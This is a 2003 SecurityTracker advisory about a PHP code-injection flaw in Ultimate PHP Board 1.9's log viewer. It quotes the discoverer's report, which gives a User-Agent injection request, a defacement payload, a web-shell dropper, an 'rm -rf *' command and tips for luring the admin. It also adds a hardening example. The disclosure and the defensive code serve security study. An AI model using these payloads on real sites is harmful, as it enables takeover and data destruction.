Ultimate PHP Board Input Validation Flaw in 'iplog' File Lets Remote Users Cause Arbitrary PHP Code to Be Executed on the System
SecurityTracker Alert ID: 1006841
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 24 2003
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Advisory: Freedom 0f Knowledge Project
Version(s): 1.9
Description: A vulnerability was reported in Ultimate PHP Board (UPB). A remote user can cause arbitrary PHP code to be executed on the system by the UPB administrator.
F0KP reported that a remote user can cause PHP code to be logged by the system and can then cause that code to be executed when the UPB administrator views the log. According to the report, the application logs the contents of the user-supplied HTTP_USER_AGENT field to the 'iplog' text file in the 'db' directory. If the remote user inserts PHP code into the user agent field, and the administrator then views the log file with the 'admin_iplog.php' script, the inserted PHP code will be executed on the target server.
A demonstration exploit transcript is provided:
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>
Some additional demonstration exploit commands are provided in the Source Message.
Impact: A remote user can cause arbitrary PHP code to be written to a log file so that, when the administrator views the log file, the arbitrary code will be executed on the target system.
Solution: No solution was available at the time of this entry.
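The entry lists no fix. As an added illustration (not UPB code and not a vendor patch), the PHP below contrasts the include()-based log viewer the report describes with a viewer that reads 'iplog' as data and HTML-escapes each line. The helper names log_visit and render_iplog, the temporary file and the "ip | user-agent" line format are assumptions.

```php
<?php
// Added example. Helper names, file location and log line format are
// assumptions for illustration; none of this is taken from UPB itself.

// Constructed sample log: one ordinary entry and one whose User-Agent
// field carries PHP tags, as in the transcript above.
$log = tempnam(sys_get_temp_dir(), 'iplog');
file_put_contents($log,
    "192.0.2.10 | Mozilla/4.0 (compatible; MSIE 6.0)\n" .
    "192.0.2.66 | <? phpinfo(); ?>\n");

// Vulnerable pattern reported for admin_iplog.php: the viewer include()s
// the log, so the PHP engine parses whatever tags a visitor got written
// into it. Left commented out on purpose.
//   include $log;

// Hardened writer (hypothetical helper): strip control characters so one
// request cannot forge extra log lines, and cap the stored length.
function log_visit(string $path, string $ip, string $ua): void
{
    $ua = substr((string) preg_replace('/[\x00-\x1F\x7F]/', '', $ua), 0, 256);
    file_put_contents($path, "$ip | $ua\n", FILE_APPEND | LOCK_EX);
}

// Hardened viewer (hypothetical helper): the log is read as plain data and
// every line is HTML-escaped, so it is neither run by PHP nor rendered as
// markup in the administrator's browser.
function render_iplog(string $path): string
{
    $out = '';
    foreach (file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $out .= htmlspecialchars($line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "<br>\n";
    }
    return $out;
}

// Constructed request whose User-Agent tries to smuggle a second log line.
log_visit($log, '192.0.2.77', "curl/7.0\r\n192.0.2.1 | forged entry");

echo render_iplog($log);
unlink($log);
```

Escaping at display time is the part that removes the code-execution path; filtering at write time only keeps the log format intact.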
Vendor URL: www.myupb.com/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "euronymous" <just-a-user@yandex.ru>
Message History: None.
Source Message Contents
Date: Sat, 24 May 2003 18:21:37 +0400 (MSD)
From: "euronymous" <just-a-user@yandex.ru>
Subject: UPB: Discussion Board/Web-Site Takeover
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: UPB: Discussion Board/Web-Site Takeover
product: Ultimate PHP Board v1.9 [ latest ]
vendor: www.myupb.com
risk: high
date: 05/24/2k3
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/024.en.txt
http://f0kp.iplus.ru/bz/024.ru.txt
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
description
-----------
there is a serious vuln that allows an attacker to execute random php
code. the UPB logs some visitor info [ such as REMOTE_ADDR and
HTTP_USER_AGENT ] in a text file under the `db' directory named `iplog'.
then in the admin panel the board admin can call admin_iplog.php, which
just includes `iplog'. Thats 0k, but..
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>
when the admin calls admin_iplog.php your php code will be executed.
examples for kodsweb skids:
1. <? system( "echo \'hacked\' > ../index.html" ); ?>
will deface forum main page
2. <? system( "echo \'<? system( $cmd ); ?>\' > ../../tcsh.php" ); ?>
will create tcsh.php in wwwroot with httpd privileges.
then you just go to http://hostname/tcsh.php?cmd=rm -rf *
after injecting code through the User-Agent field you have to wait for the admin to see
the admin_iplog.php. how to make the admin see the iplog?? its quite easy
== just annoy the admin, use the swearing in board messages, etc.
bonus
-----
in http://www.securityfocus.com/archive/1/302459 i just wrote
about some vuln in prior versions of UPB. and i wanna say that
some described vulns still exist in 1.9!!
have a nice day >:E
shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!
================
im not a lame,
not yet a hacker
================